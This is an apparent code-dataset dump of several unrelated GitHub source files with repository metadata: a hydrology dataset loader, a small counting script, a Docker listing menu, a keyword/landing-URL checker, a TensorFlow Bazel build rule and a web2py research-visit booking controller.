def _load_data(self, forcing_type):\n        # Loading vanilla data\n        basin_number = len(self.basins_list)\n        for idx, basin in enumerate(self.basins_list):\n            print(self.stage, f\"{basin}: loading data %.4f\" % (idx / basin_number))\n            reader = HydroReaderFactory.get_hydro_reader(self.camels_root, forcing_type, basin)\n            df_x = reader.get_df_x()\n            df_y = reader.get_df_y()\n\n            # Select date\n            df_x = df_x[self.dates[0]:self.dates[1]]\n            df_y = df_y[self.dates[0]:self.dates[1]]\n            assert len(df_x) == len(df_y)\n            self.date_index_dict[basin] = df_x.index\n\n            # Select used features and discharge\n            x = df_x.values.astype(\"float32\")\n            y = df_y.values.astype(\"float32\")\n\n            self.x_dict[basin] = x\n            self.y_dict[basin] = y\n\n            self.length_ls.append(len(x) - self.past_len - self.pred_len + 1)\n            # adding static attributes\n            self.norm_static_fea[basin] = self.static_reader.get_df_static(basin)\n\n            # Calculate mean and std in training stage\n            if self.stage == 'train':\n                self.y_stds_dict[basin] = y.std(axis=0).item()\n\n    def normalize_data(self):\n        # Normalize data\n        for idx, basin in enumerate(self.basins_list):\n            print(self.stage, \"Normalizing %.4f\" % (idx / len(self.basins_list)))\n            x = self.x_dict[basin]\n            y = self.y_dict[basin]\n            # Normalize data\n            x_norm = self._local_normalization(x, variable='inputs')\n            y_norm = self._local_normalization(y, variable='output')\n            norm_static_fea = self.norm_static_fea[basin].repeat(x_norm.shape[0], axis=0)\n            x_norm_static = np.concatenate([x_norm, norm_static_fea], axis=1)\n            self.x_dict[basin] = x_norm_static\n            self.y_dict[basin] = y_norm\n\n    def __getitem__(self, idx: int):\n        basin_idx = bisect_right(self.index_ls, idx) - 1\n        local_idx = idx - self.index_ls[basin_idx]\n        basin = self.basins_list[basin_idx]\n        x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len + self.pred_len, :]\n        y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n        y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n        return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n\nclass CamelsDatasetLimited(CamelsDataset):\n    def __getitem__(self, idx: int):\n        basin_idx = bisect_right(self.index_ls, idx) - 1\n        local_idx = idx - self.index_ls[basin_idx]\n        basin = self.basins_list[basin_idx]\n        x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len, :]\n        y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n        y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n        return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n\nclass DatasetFactory:\n    @staticmethod\n    def get_dataset_type(use_future_fea, use_static):\n        if (not use_future_fea) and use_static:\n            raise RuntimeError(\"Not implemented yet.\")\n        elif not use_future_fea:\n            ds = CamelsDatasetLimited\n        elif use_static:\n            ds = CamelsDatasetWithStatic\n        else:\n            ds = CamelsDataset\n        return ds\n
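\n\nif __name__ == \"__main__\":\n    # Minimal usage sketch (illustrative only: the CAMELS root path and the\n    # basin id below are hypothetical placeholders, not part of the module).\n    ds_cls = DatasetFactory.get_dataset_type(use_future_fea=True, use_static=False)\n    train_ds = ds_cls(\"/path/to/CAMELS-US\", \"daymet\", [\"01013500\"], 365, 7, \"train\",\n                      [pd.Timestamp(\"1980-10-01\"), pd.Timestamp(\"1995-09-30\")])\n    # Reuse the training statistics when building the val/test datasets.\n    x_mean, y_mean = train_ds.get_means()\n    x_std, y_std = train_ds.get_stds()\n    print(len(train_ds), train_ds[0][0].shape)\n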
","repo_name":"iThronne/RR-Former","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":20807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"}
+{"seq_id":"4148645910","text":"infile = \"epi_enzyme_prelim_study_search_no_filter.txt\"\r\noutfile = \"distribution_epi_enzyme_prelim_study_search_no_filter.txt\"\r\n\r\nthefile = open(outfile, 'w')\r\n\r\nwith open(infile, \"r\") as ins:\r\n    fullfile = ins.readlines()[1:]\r\nins.close()\r\nc = 0\r\n\r\ncount = {}\r\n\r\nfor fn in fullfile:\r\n    gn = fn.strip()\r\n    temp = gn.split(\"\\t\")\r\n    ids = temp[1].split(\",\")\r\n    for each_id in ids:\r\n        if each_id in count:\r\n            count[each_id] += 1\r\n        else:\r\n            count[each_id] = 1\r\n\r\nfor key in count:\r\n    thefile.write(key + \"\\t\" + str(count[key]) + \"\\n\")\r\n\r\nthefile.close()  # close the output file (it was opened with 'w' and never closed)\r\n","repo_name":"VidhurDS/misc-scripts","sub_path":"distribution_finder.py","file_name":"distribution_finder.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"21121305980","text":"from active_conts import list_active_containers\nfrom inactive_conts import list_inactive_containers\nfrom inactive_vols import list_unassociated_volumes\n\ndef main_menu():\n    while True:\n        print(\"\\nMENU:\")\n        print(\"1. List active docker containers and their associated volumes.\")\n        print(\"2. List inactive docker containers and their associated volumes.\")\n        print(\"3. List volumes that are not associated with a container.\")\n        print(\"4. Quit\")\n\n        choice = input(\"Please select an option: \")\n\n        if choice == '1':\n            list_active_containers()\n        elif choice == '2':\n            list_inactive_containers()\n        elif choice == '3':\n            list_unassociated_volumes()\n        elif choice == '4':\n            print(\"Exiting.\")\n            break\n        else:\n            print(\"Invalid option.\")\n\nif __name__ == \"__main__\":\n    main_menu()\n\n","repo_name":"saadimalik211/gensosekai","sub_path":"dockercontrol/pythontesting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"28585192399","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 18 13:38:02 2019\n\n@author: ptck\n\"\"\"\n\n\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 30 13:44:22 2019\n\n@author : ptck\n\"\"\"\nimport csv\nimport sys, traceback, time\n#from os import environ\n#import time\n\n\n#import os\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n#from pandas import Series, read_csv\n\n#from multiprocessing import Pool\nfrom urllib import parse\n#from functools import partial\nimport datetime\nfrom os import makedirs\nfrom os import chdir\n\n\n#chdir('/Users/ptck/Downloads')\nDa_1 = datetime.datetime.now()\nDATE = Da_1.strftime('%Y/%m/%d/%H')\n\n\norigin_input_path = './dbproj/includes/'\norigin_output_path='./output/%s/'%(DATE)\n\n\n\ntry :\n    makedirs(origin_output_path)\nexcept:\n    pass\n\n\n\n\n# Load the merged csv file\n \n\ndef read_file(filename) :\n    origin_input_path = './dbproj/includes/'\n    # for reading the csv file\n    f = filename\n    models = dict()\n    # (column keys stay in Korean to match the euc-kr CSV header:\n    #  품목=item, 그룹=group, 키워드=keyword, 랜딩URL=landing URL, 매체=medium)\n    with open(origin_input_path+f, 'r', newline='',encoding='euc-kr') as file:\n        models['품목']=[]\n        models['그룹']=[]\n        models['키워드']=[]\n        models['랜딩URL']=[]\n        models['매체']=[]\n        for num,line in enumerate(file.readlines()):\n            # (column 0 holds the item name)\n            lines = line.split(',')\n            # row 0 is the header, so it holds no needed information\n            if num <=0:\n                continue\n            # if the item column is an empty string there are no more URLs\n            if lines[0]=='':\n                break\n            \n            # append the keyword fields\n            models['품목'].append(lines[0])\n            models['그룹'].append(lines[1])\n            models['키워드'].append(lines[2])\n            models['랜딩URL'].append(lines[3])\n            models['매체'].append(lines[4])\n    # (commented out) for extracting only the model names\n    #try :\n    #\n    #    a = lines.index('')\n    #    models['model'].append(lines[1:a])\n    #except:\n    #    models['model'].append(lines[1:])\n    \n    \n    #print(csv_data)\n    return models\n
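\n\n# Expected layout of Keyword.csv (illustrative sketch; the header row follows the\n# euc-kr source file read above, the data row is a made-up placeholder):\n#   품목,그룹,키워드,랜딩URL,매체\n#   printer,groupA,SL-C480W,https://www.example.com/event_SL-C480W,N\n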
\n\n#Table = read_csv(origin_input_path+'Keyword.csv',encoding='euc-kr',low_memory=False)\nTable = read_file('Keyword.csv')\n\nkey = Table[\"품목\"]\ngroup = Table[\"그룹\"]\nkeyword = Table[\"키워드\"]\nurl = Table[\"랜딩URL\"]\nngd = Table[\"매체\"]\n\ndef Check_Unicode(keyword, url) :\n    check_col = []\n    te = []\n    \n    for i in range(len(url)):\n        url_1 = url[i][::-1]\n\n        cut_num = url_1.find(\"_\")\n\n        try :\n            fin_num = url_1.find(\"#\")\n        except:\n            fin_num = 0\n        if cut_num <= fin_num:\n            fin_num = 0 \n        url_3 = url_1[fin_num:cut_num]\n        url_final = url_3[::-1]\n        text = parse.unquote(url_final) # text is the URL fragment with its percent-encoding decoded back to Korean\n        text_upper = text.upper()\n        te.append(text_upper)\n        if keyword[i].upper() == te[-1] :\n            check_col.append(\"Match\")\n        else : \n            check_col.append(\"Mismatch\")\n    return check_col,te\n\n\ndef Concate_Table(keyword,url):\n    check = Check_Unicode(keyword, url)\n\n    return check \n\n\n\"Above: checks whether the URL cid conversion is correct\"\n\"---------------------------------------------------------------\"\n\"From here on: checks whether the URL lands correctly\"\n\n\ndef remove_dup(url):\n    # dup_N holds the counts of consecutive duplicate urls; short_url holds the urls with the cid query values removed\n    \n    dup_N = []\n    short_url = []\n    url_1 = []\n    for i in url:\n        if '?' in i:\n            \n            num_1 = i.index('?')\n            \n            url_1.append(i[:num_1])\n        else:\n            url_1.append(i)\n        #know_url.append(i[num_2+4:num_1])\n    #N = list(set(know_url))\n    a = 1\n\n    for i,j in enumerate(url_1) :\n        if i == len(url_1)-1:\n            dup_N.append(a)\n            short_url.append(j)\n            break\n        elif (i == 0) & (j != url_1[1]):\n            dup_N.append(a)\n            short_url.append(j)\n            continue\n        elif j == url_1[i+1]:\n            a+=1\n            continue\n        \n        else:\n            dup_N.append(a)\n            short_url.append(j)\n            a = 1\n            continue\n    \n    return short_url, dup_N\n\n\ndef Check_URL(k): \n    start_time = time.time()\n    URL_list = k\n\n    CheckList = []\n    \n    for url in URL_list :\n        \n        while True:\n            try:\n                url_data = requests.get(url, verify=False)\n                \n                url_check = url_data.status_code\n                break\n            except:\n                print(\"Connection refused by the server..\")\n                print(\"Let me sleep for 5 seconds\")\n                time.sleep(5)\n                continue\n        if 200 <= url_check <300:\n            CheckList.append(\"Landing OK\")\n            \n        elif 300 <= url_check <400 :\n            CheckList.append(\"Landing abnormal (redirecting)\")\n        else:\n            print(url)\n            print(url_check)\n            CheckList.append(\"Landing abnormal\")\n        \n        '''\n        if len(url_redirected) == 0: # if there was no redirect there are two cases: the url lands normally or it fails to land\n            \n            if url_check == 200 :\n                \n                \n               # if soup.find(\"div\",{\"class\":'event-end-txt'}).find('strong').text != \"이벤트가 종료되었습니다.\" :\n                \n                # shouldn't it be changed like this?? (the Korean literal below is the on-page \"the event has ended\" banner text)\n                if soup.find(\"div\",{\"class\":'event-end-txt'}) : \n                    if soup.find(\"div\",{\"class\":'event-end-txt'}).find('strong').text != \"이벤트가 종료되었습니다.\" :\n                        CheckList.append(\"Landing abnormal (event ended)\")\n                        A.append(\"\")\n                \n                # status 200 covers two cases, a normal landing and the \"event has ended\" page; the ended event must be classed as an abnormal landing\n                \n                else : \n                    CheckList.append(\"Landing OK\")\n                    A.append(\"\")\n            #else: # even with a 200, treat pages showing the \"event has ended\" banner as abnormal landings\n            #    CheckList.append(\"Landing abnormal (event ended)\")\n                \n            else :\n                CheckList.append(\"URL not found\") # 2xx codes are normal and the rest here are not redirects, so \"URL not found\" is correct \n                A.append(url_check)\n        else: # this is the redirect case. \n            num = len(url_redirected) - 1 # the list is zero-indexed\n            Last_redirected = url_redirected[num] # gives the status value (300, 200, ...) of the last redirected address\n            #print(Last_redirected) # printing this would clarify the logic below: a 200/300 value can be compared directly, otherwise convert it to a url and compare\n            if Last_redirected == 200 :\n                CheckList.append(\"Landing abnormal (redirecting)\") ### needs fixing! a redirect should count as abnormal, so just mark everything redirected as abnormal\n                A.append(Last_redirected)\n            #\n            # This part needs fixing: even if a redirect lands \"normally\", a completely 
different page may appear, and if that happens we have no way to verify it\n            # short of checking every page by eye. \n            ### Alternatively, write logic that treats the landing as correct when the product keyword encoded in the pre-redirect url appears in the source of the final redirected page\n            else: \n                CheckList.append(\"Landing abnormal (URL not found)\")\n                A.append(Last_redirected)\n            # we should distinguish whether this finally landed url page, although it opened normally, is actually the right page\n            # if we simply count anything that opens as normal, then the redirect case also reduces to two outcomes: the final redirected landing page is either normal or not found\n        '''\n    print(\"-------- %s seconds --------\" % (time.time() - start_time))    \n    return CheckList\n\ndef put_url_N(check, url_N):\n    #short = []\n    check_value = []\n    \n    for k,o in enumerate(check):\n        i=0\n        while i!=url_N[k]:\n            check_value.append(o)\n            #short.append(short_url[k])\n            i+=1\n\n    #Ch = DataFrame(check_value,columns=['URL_Check'])\n    return check_value\n\n\nprint('Start')\nshort_url = remove_dup(url)[0]\n\nNum_list = remove_dup(url)[1]\n\n# result1 is the list of cid check values\nresult1 = Concate_Table(keyword,url)[0]\n\n# result2 holds the url check results \nCh = Check_URL(short_url)\nresult2 = put_url_N(Ch,Num_list)\n\n\n\n\ndef MakeTable(key,group,keyword,url,ngd,cid,check):\n    final = []\n    # output headers are kept in Korean to match the source sheet (일치 여부 = match status)\n    name = ['품목','그룹','키워드','랜딩URL','매체','일치 여부','Status']\n    a = len(key)\n    final.append(name)\n    for i in range(a):\n        final_1 = []\n        final_1+= key[i], group[i], keyword[i], url[i], ngd[i], cid[i], check[i]\n        final.append(final_1)\n    return final\n\nFinal = MakeTable(key,group,keyword,url,ngd,result1,result2)\n\ncsv.register_dialect(\n    'mydialect',\n    delimiter = ',',\n    quotechar = '\"',\n    doublequote = True,\n    skipinitialspace = True,\n    lineterminator = '\\r\\n',\n    quoting = csv.QUOTE_MINIMAL)\n\n\n\nwith open(origin_output_path+'Cid&URL_Check.csv', 'w', newline='',encoding='euc-kr') as mycsvfile:\n    thedatawriter = csv.writer(mycsvfile,dialect='mydialect')\n    for row in Final:\n        thedatawriter.writerow(row)\n\n\n''' \n\n\nurl = 'https://www.samsung.com/sec/support/model/SL-C480W/'\n\n\nurl_data = requests.get(url, verify=False) #(url, allow_redirects = True)\n#url_text = url_data.text\n#soup = BeautifulSoup(url_text, 'html.parser')\nurl_redirected = url_data.history\nurl_check = url_data.status_code\n\n'''\n","repo_name":"matherrr/brad","sub_path":"Cid_check.py","file_name":"Cid_check.py","file_ext":"py","file_size_in_byte":10429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"44206207939","text":"\"\"\"Targets for generating TensorFlow Python API __init__.py files.\"\"\"\n\nload(\"//tensorflow/python/tools/api/generator:api_init_files.bzl\", \"TENSORFLOW_API_INIT_FILES\")\n\n# keep sorted\nESTIMATOR_API_INIT_FILES = [\n    # BEGIN GENERATED ESTIMATOR FILES\n    \"__init__.py\",\n    \"estimator/__init__.py\",\n    \"estimator/export/__init__.py\",\n    \"estimator/inputs/__init__.py\",\n    # END GENERATED ESTIMATOR FILES\n]\n\ndef get_compat_files(\n        file_paths,\n        compat_api_version):\n    \"\"\"Prepends compat/v to file_paths.\"\"\"\n    return [\"compat/v%d/%s\" % (compat_api_version, f) for f in file_paths]\n\ndef gen_api_init_files(\n        name,\n        output_files = TENSORFLOW_API_INIT_FILES,\n        root_init_template = None,\n        srcs = [],\n        api_name = \"tensorflow\",\n        api_version = 2,\n        compat_api_versions = [],\n        package = \"tensorflow.python\",\n        package_dep = \"//tensorflow/python:no_contrib\",\n        output_package = \"tensorflow\",\n        output_dir = \"\"):\n    \"\"\"Creates API directory structure and __init__.py files.\n\n    Creates a genrule that generates a directory structure with __init__.py\n    files that import all exported modules (i.e. modules with tf_export\n    decorators).\n\n    
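Example (illustrative BUILD usage; the target and template names here are\n    placeholder assumptions, not taken from the TensorFlow build files):\n\n        gen_api_init_files(\n            name = \"tensorflow_python_api_gen\",\n            srcs = [\"api_template.__init__.py\"],\n            root_init_template = \"api_template.__init__.py\",\n        )\n\n    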
Args:\n        name: name of genrule to create.\n        output_files: List of __init__.py files that should be generated.\n            This list should include a file name for every module exported using\n            tf_export. E.g., if an op is decorated with\n            @tf_export('module1.module2', 'module3'), then output_files should\n            include module1/module2/__init__.py and module3/__init__.py.\n        root_init_template: Python init file that should be used as template for\n            root __init__.py file. \"# API IMPORTS PLACEHOLDER\" comment inside this\n            template will be replaced with root imports collected by this genrule.\n        srcs: genrule sources. If passing root_init_template, the template file\n            must be included in sources.\n        api_name: Name of the project that you want to generate API files for\n            (e.g. \"tensorflow\" or \"estimator\").\n        api_version: TensorFlow API version to generate. Must be either 1 or 2.\n        compat_api_versions: Older TensorFlow API versions to generate under\n            compat/ directory.\n        package: Python package containing the @tf_export decorators you want to\n            process.\n        package_dep: Python library target containing your package.\n        output_package: Package where generated API will be added to.\n        output_dir: Subdirectory to output API to.\n            If non-empty, must end with '/'.\n    \"\"\"\n    root_init_template_flag = \"\"\n    if root_init_template:\n        root_init_template_flag = \"--root_init_template=$(location \" + root_init_template + \")\"\n\n    api_gen_binary_target = (\"create_\" + package + \"_api_%d\") % api_version\n    native.py_binary(\n        name = api_gen_binary_target,\n        srcs = [\"//tensorflow/python/tools/api/generator:create_python_api.py\"],\n        main = \"//tensorflow/python/tools/api/generator:create_python_api.py\",\n        srcs_version = \"PY2AND3\",\n        visibility = [\"//visibility:public\"],\n        deps = [\n            package_dep,\n            \"//tensorflow/python:util\",\n            \"//tensorflow/python/tools/api/generator:doc_srcs\",\n        ],\n    )\n\n    all_output_files = [\"%s%s\" % (output_dir, f) for f in output_files]\n    compat_api_version_flags = \"\"\n    for compat_api_version in compat_api_versions:\n        compat_api_version_flags += \" --compat_apiversion=%d\" % compat_api_version\n\n    native.genrule(\n        name = name,\n        outs = all_output_files,\n        cmd = (\n            \"$(location :\" + api_gen_binary_target + \") \" +\n            root_init_template_flag + \" --apidir=$(@D)\" + output_dir +\n            \" --apiname=\" + api_name + \" --apiversion=\" + str(api_version) +\n            compat_api_version_flags + \" --package=\" + package +\n            \" --output_package=\" + output_package + \" $(OUTS)\"\n        ),\n        srcs = srcs,\n        tools = [\":\" + api_gen_binary_target],\n        visibility = [\n            \"//tensorflow:__pkg__\",\n            \"//tensorflow/tools/api/tests:__pkg__\",\n        ],\n    )\n","repo_name":"steerzac/chkstong-yibbibi","sub_path":"tensorflow-master/tensorflow/python/tools/api/generator/api_gen.bzl","file_name":"api_gen.bzl","file_ext":"bzl","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"}
+{"seq_id":"8556926518","text":"import datetime\nimport os  # needed below for os.path.join when loading costs.json\nfrom collections import Counter\nfrom gluon.serializers import json\nimport simplejson\n\nfrom safe_web_global_functions import (admin_decision_form, safe_mailer, datepicker_script,\n                                       all_rv_summary_text, all_rv_summary_excel,\n                                       single_rv_summary_excel, uname, get_frm)\n\n\n# -----------------------------------------------------------------------------\n# RESEARCH VISITS\n# -- provide a general grid view of visits for users and routes to a detail view \n# that allows research visits to be 
proposed and various bookings to be made\n# -----------------------------------------------------------------------------\n\n\n@auth.requires_login()\ndef research_visits():\n \"\"\"\n This controller shows the grid view for visits and allows\n logged in users to view details\n\n It uses a custom button to divert from the SQLFORM.grid view to a\n custom view page that allows project members to add visitors\n \"\"\"\n\n # For standard users (need a separate admin projects controller)\n # don't show the authorization fields and don't show a few behind \n # the scenes fields\n db.research_visit.admin_notes.readable = False\n\n # create a links list that:\n # 1) creates a custom button to pass the row id to a custom view \n # Commented out code here allows the form to show a pretty icon for status, BUT\n # blocks it from being used in searches. So don't do that.\n\n links = [ # dict(header = 'Admin Status', body = lambda row: approval_icons[row.admin_status]),\n dict(header='', body=lambda row: A('View', _class='button btn btn-default',\n _href=URL(\"research_visits\", \"research_visit_details\",\n args=[row.id]),\n _style='padding: 3px 10px 3px 10px;'))\n ]\n\n # suppress status in SQLFORM grid whilst making it available for links\n # db.research_visit.admin_status.readable = True \n\n form = SQLFORM.grid(db.research_visit, csv=False,\n fields=[db.research_visit.project_id, db.research_visit.title,\n db.research_visit.arrival_date, db.research_visit.departure_date,\n db.research_visit.admin_status],\n maxtextlength=250,\n deletable=False,\n editable=False,\n create=False,\n details=False,\n links=links,\n links_placement='right',\n formargs={'showid': False})\n\n return dict(form=form)\n\n\n@auth.requires_login()\ndef research_visit_details():\n \"\"\"\n Complex controller to book visits to give a single page to hold:\n * Complete and submit basic RV details (purpose/period)\n * That exposes a set of booking controls...\n - visitors and H&S\n - booking beds at SAFE and Maliau\n - booking RA time\n - booking transfers\n * ... 
and a set of tables of existing bookings with cancel buttons\n \n It relies on some client side javascript to:\n - check before deleting visitors\n - update SAFE availability\n - provide check all buttons for selecting sets of checkboxes\n - restricted date ranges using datepicker (parameterised on the fly from the controller)\n \"\"\"\n\n #\n # SECTION 1) CHECK USER STATUS AND SET UP \n #\n\n # Three possible entry points, for a three step process to allow project date look ups\n # - Completely new RV request(bare URL)\n # - Project specified for new RV request (project_id as a variable, but no record)\n # research_visits/research_visit_details?new=152\n # - Existing record passed as an argument to the URL\n # research_visits/research_visit_details/12\n\n # 1a) SANITISE THE INPUTS\n rv_id = request.args(0)\n\n if rv_id is not None:\n record = db.research_visit(rv_id)\n new_rv_project_requested = '0'\n # # If the visit is given as an ID, does it really exist?\n if record is None:\n session.flash = B(CENTER('Invalid research visit id'), _style='color:red;')\n redirect(URL('research_visits', 'research_visits'))\n else:\n record = None\n new_rv_project_requested = request.vars['new']\n # if a project has been requested (and it isn't a look see project) \n # then check it exists and is approved\n if new_rv_project_requested is not None and new_rv_project_requested != '0':\n new_project_record = db((db.project_id.id == new_rv_project_requested) &\n (db.project_details.id ==\n db.project_id.project_details_id)).select().first()\n if new_project_record is None:\n session.flash = B(CENTER('Invalid new visit project reference'),\n _style='color:red;')\n redirect(URL('research_visits', 'research_visit_details'))\n elif new_project_record.project_details.admin_status != 'Approved':\n session.flash = B(\n CENTER('A research project must be approved before booking research visits'),\n _style='color:red;')\n redirect(URL('research_visits', 'research_visit_details'))\n\n # 1b) get a list of approved projects that the user is a coordinator of,\n # to check for both project selection and subsequent project detail\n # editing and booking.\n coord_query = db((db.project_members.user_id == auth.user_id) &\n (db.project_members.is_coordinator == 'True') &\n (db.project_members.project_id == db.project_id.id) &\n (db.project_id.project_details_id == db.project_details.id) &\n (db.project_details.admin_status == 'Approved'))\n\n rows = coord_query.select(db.project_details.project_id, db.project_details.title)\n available_project_ids = [r.project_id for r in rows]\n available_project_titles = [r.title for r in rows]\n\n # 1c) setup whether the record is editable\n if record is None:\n # just in the process of launching a proposal\n readonly = False\n elif record.admin_status == 'Submitted':\n # this proposal is under consideration, regardless of user\n readonly = True\n elif record.departure_date < datetime.date.today():\n # this proposal happened in the past\n readonly = True\n elif (record.project_id in available_project_ids):\n # this proposal is in the set that the user is a coordinator for\n readonly = False\n elif record.project_id is None and auth.user.id == record.proposer_id:\n # The proposer is editing his own look see visit.\n readonly = False\n elif auth.has_membership('admin'):\n # The proposal is being viewed by an admin (and none of the cases above are true)\n readonly = False\n else:\n # just a random viewer, so no write access\n readonly = True\n\n # SECTION 2) CAPTURE THE BASIC VISIT DETAILS\n 
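# (Note, added: the readonly flag computed in SECTION 1 above gates the summary\n    # form and every booking control constructed in the rest of this controller.)\n    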
# This is a three step process. \n # A) Get a project reference, in order to get date limits, \n # B) Provide a fuller visit details form \n # C) Expose a set of booking controls for the user to build the plan\n\n if rv_id is None and new_rv_project_requested is None:\n\n # Bare URL submitted: provide a list of available projects + look see visit\n # and redirect back to the page, with the new project_id for the next step\n\n project_selector = SELECT(OPTION('Look see visit', _value='0'),\n *[OPTION(title, _value=pid) for title, pid in\n zip(available_project_titles, available_project_ids)],\n _class='form-control', _name='project_selector')\n\n visit = FORM(DIV(DIV(H5('Research visit summary'), _class=\"panel-heading\"),\n DIV(DIV(LABEL('Choose project:', _class=\"control-label col-sm-2\"),\n DIV(project_selector, _class=\"col-sm-8\"),\n TAG.BUTTON('Select', _style=\"padding: 5px 15px\", _class='col-sm-2',\n _type='submit', _name='submit_project_select'),\n _class='row', _style='margin:10px 10px'),\n _class='panel_body'),\n _class=\"panel panel-primary\"))\n\n if visit.validate():\n # reload the URL with the id of the new project as a variable\n redirect(URL('research_visits', 'research_visit_details',\n vars={'new': visit.vars.project_selector}))\n\n else:\n # Either a) URL with a project requested as a variable 'research_visit_details?new='866' \n # b) URL giving an existing record 'research_visit_details/4' \n if rv_id is not None:\n # intercept existing records first\n buttons = [TAG.button('Save edits', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n elif new_rv_project_requested is not None:\n # then new ones (as the code sets new_rv_request_submitted = 0 for rv_id calls)\n buttons = [TAG.button('Create proposal', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n\n # Use SQLFORM for DB input - fix the proposer ID here\n db.research_visit.proposer_id.default = auth.user.id\n db.research_visit.proposer_id.writable = False\n visit = SQLFORM(db.research_visit,\n record=record,\n readonly=readonly,\n fields=['title', 'arrival_date', 'proposer_id',\n 'departure_date', 'purpose', 'licence_details'],\n buttons=buttons,\n showid=False)\n\n # process the visit form to create hidden fields and to process input\n if visit.process(onvalidation=validate_research_visit_details, formname='visit').accepted:\n\n # if this is a new proposal then need to insert the project_id,\n # which isn't included in the form, but not if this is a look see visit\n if rv_id is None and new_rv_project_requested != '0':\n db.research_visit(visit.vars.id).update_record(project_id=new_rv_project_requested)\n\n # if this is a new draft, email the proposer the link for the page\n if rv_id is None:\n safe_mailer(to=auth.user.email,\n subject='SAFE: draft research visit proposal created',\n template='research_visit_created.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits', 'research_visit_details',\n args=[visit.vars.id], scheme=True,\n host=True)})\n\n db.research_visit(visit.vars.id).update_record(admin_status='Draft',\n admin_history='Draft proposal created: {}'.format(\n datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%MZ')))\n session.flash = CENTER(B('Research visit proposal created'), _style='color: green')\n\n else:\n session.flash = CENTER(B('Research visit proposal updated'), _style='color: green')\n\n redirect(URL('research_visits', 'research_visit_details', args=visit.vars.id))\n else:\n\n pass\n\n # Now 
repackage the form into a custom DIV\n # edit form widgets - notably, override the default date widget classes to allow\n # them to use the daterange datepicker\n if not readonly:\n visit.custom.widget.purpose['_rows'] = 4\n visit.custom.widget.arrival_date['_class'] = \"form-control input-sm\"\n visit.custom.widget.departure_date['_class'] = \"form-control input-sm\"\n purpose_message = P('''Please provide a detailed description here and then request\n all the resources you will need. If your research visit \n will not need to use our RAs or transfers, please mention\n what alternatives you will be using so that we know you have\n a complete fieldwork plan.''')\n else:\n purpose_message = ''\n\n # get the project details\n if (record is not None and record.project_id is not None) or (\n new_rv_project_requested != '0'):\n\n if new_rv_project_requested != '0':\n pid = int(new_rv_project_requested)\n elif record.project_id is not None:\n pid = record.project_id\n\n proj_row = db((db.project_id.id == pid) & (\n db.project_id.project_details_id == db.project_details.id))\n project_details = proj_row.select().first()\n proj_title = project_details.project_details.title\n\n else:\n project_details = None\n proj_title = 'Look see visit'\n\n proj_row = DIV(LABEL('Project title:', _class=\"control-label col-sm-2\"),\n DIV(proj_title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px')\n\n # get a download link for the budget and timetable spreadsheet\n if rv_id is None:\n download_link = DIV()\n else:\n download_link = CAT(\n 'Click on this link to download a spreadsheet of the details and estimated costs: ',\n A('Download spreadsheet',\n _href=URL('research_visits', 'export_my_research_visit', args=rv_id)))\n\n # fix up the dates to control the datepicker and the bed booking limits\n if auth.has_membership('admin'):\n # admins can book up to capacity and do so over any time period\n visit_start_min = ''\n visit_end_max = ''\n bed_booking_limit = bed_booking_capacity\n else:\n if new_rv_project_requested == '0' or (\n record is not None and record.project_id is None):\n # look see visits can book up to the normal bed limit with a fortnights notice\n visit_start_min = '+14d'\n visit_end_max = ''\n else:\n # project bookings have to be at least 14 days notice and within the project dates\n project_start = project_details.project_details.start_date\n project_end = project_details.project_details.end_date\n fortnight = datetime.date.today() + datetime.timedelta(days=14)\n # check the project hasn't finished\n if project_end < fortnight:\n session.flash = CENTER(\n B('The completion date for the proposed project has passed.'),\n _style='color: red')\n redirect(URL('research_visits', 'research_visit_details'))\n else:\n visit_start_min = max(project_start, fortnight).isoformat()\n visit_end_max = project_end.isoformat()\n\n # javascript to run the datepicker\n visit_js = datepicker_script(html_id='visit_datepicker',\n autoclose='true',\n startDate='\"' + visit_start_min + '\"',\n endDate='\"' + visit_end_max + '\"')\n\n # status flag\n if record is not None:\n status = DIV(approval_icons[record.admin_status], XML(' '),\n 'Status: ', XML(' '), record.admin_status,\n _class='col-sm-3',\n _style='padding: 5px 15px 5px 15px;'\n 'background-color:lightgrey;color:black;')\n else:\n status = DIV()\n\n visit = FORM(DIV(DIV(\n DIV(H5('Research visit summary', _class='col-sm-9'), status, _class='row',\n _style='margin:0px 0px'),\n _class=\"panel-heading\"),\n DIV(visit.custom.begin, proj_row,\n 
